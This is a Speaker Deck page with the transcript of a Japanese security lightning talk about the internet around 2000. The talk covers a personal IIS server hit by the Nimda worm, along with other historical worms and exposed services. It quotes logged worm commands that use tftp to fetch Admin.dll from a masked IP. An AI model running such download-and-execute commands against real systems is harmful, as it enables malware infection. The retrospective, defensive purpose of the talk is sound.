Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
あの頃(2000年頃)のインターネット / The Internet in the early...
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
tkito
January 23, 2025
Technology
150
1
Share
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。
tkito
January 23, 2025
More Decks by tkito
See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
tkito
0
1.1k
Re: SQLiから始めるRCE生活 / RCE via SQLi
tkito
0
350
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
tkito
2
3.7k
Linuxでの権限昇格 / Privilege Escalation in Linux
tkito
0
1.1k
SOC-IRとOSCP / SOC-IR and OSCP
tkito
0
150
Other Decks in Technology
See All in Technology
可視化から活用へ — Mesh化・Segmentation・アライメントの研究動向
gpuunite_official
0
210
The Bag-of-Documents Model for Query Understanding and Retrieval
dtunkelang
0
120
AIエージェントの支払い基盤 AgentCore Payments概要
kmiya84377
2
190
毎日の作業を Claude Code 経由にしたら、 ノウハウがコードになった
kossykinto
1
1.4k
Oracle Cloud Infrastructure presents managed, serverless MCP Servers for Oracle AI Database
thatjeffsmith
1
320
iOS・Androidの文字サイズ設定をWebViewに!モバイルUIのアクセシビリティTips
shincarpediem
2
110
2026-05-14 要件定義からソース管理まで!IBM Bob基礎ハンズオン
yutanonaka
0
160
Purview Endpoint DLP 動かしてみた
kozakigh
0
410
クラウドネイティブ DB はいかにして制約を 克服したか? 〜進化歴史から紐解く、スケーラブルアーキテクチャ設計指針〜
hacomono
PRO
6
1k
バイブコーディング、仕様駆動、その先へ - 「不確実性に対する検査‧適応のサイクル」を設計する
littlehands
1
250
Swift Sequence の便利 API 再発見
treastrain
1
280
20260515 ⾃分のアカウントとプライバシーを守る認証と認可の話〜利⽤者向け〜
oidfj
0
590
Featured
See All Featured
Leo the Paperboy
mayatellez
7
1.8k
Code Reviewing Like a Champion
maltzj
528
40k
The Illustrated Children's Guide to Kubernetes
chrisshort
51
52k
Exploring anti-patterns in Rails
aemeredith
3
350
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
2
190
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
54k
Large-scale JavaScript Application Architecture
addyosmani
515
110k
職位にかかわらず全員がリーダーシップを発揮するチーム作り / Building a team where everyone can demonstrate leadership regardless of position
madoxten
62
54k
How to Think Like a Performance Engineer
csswizardry
28
2.6k
The AI Revolution Will Not Be Monopolized: How open-source beats economies of scale, even for LLMs
inesmontani
PRO
3
3.4k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
46
2.8k
jQuery: Nuts, Bolts and Bling
dougneiner
66
8.4k
Transcript
あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう
自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり
2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット
あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます
私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •
ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀
事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5
Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理
- @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html
何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット
7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll
どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8
あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL
Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9
昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10
Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)
まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット
12
おしまい きとう @tkito 13
SiteGround - Reliable hosting with speed, security, and support you can count on.
tkito
gpuunite_official
dtunkelang
kmiya84377
kossykinto
thatjeffsmith
shincarpediem
yutanonaka
kozakigh
hacomono
littlehands
treastrain
.png){kind=avatar}
oidfj
mayatellez
maltzj
chrisshort
aemeredith
stephenakadiri
destraynor
addyosmani
madoxten
csswizardry
inesmontani
bcantrill
dougneiner
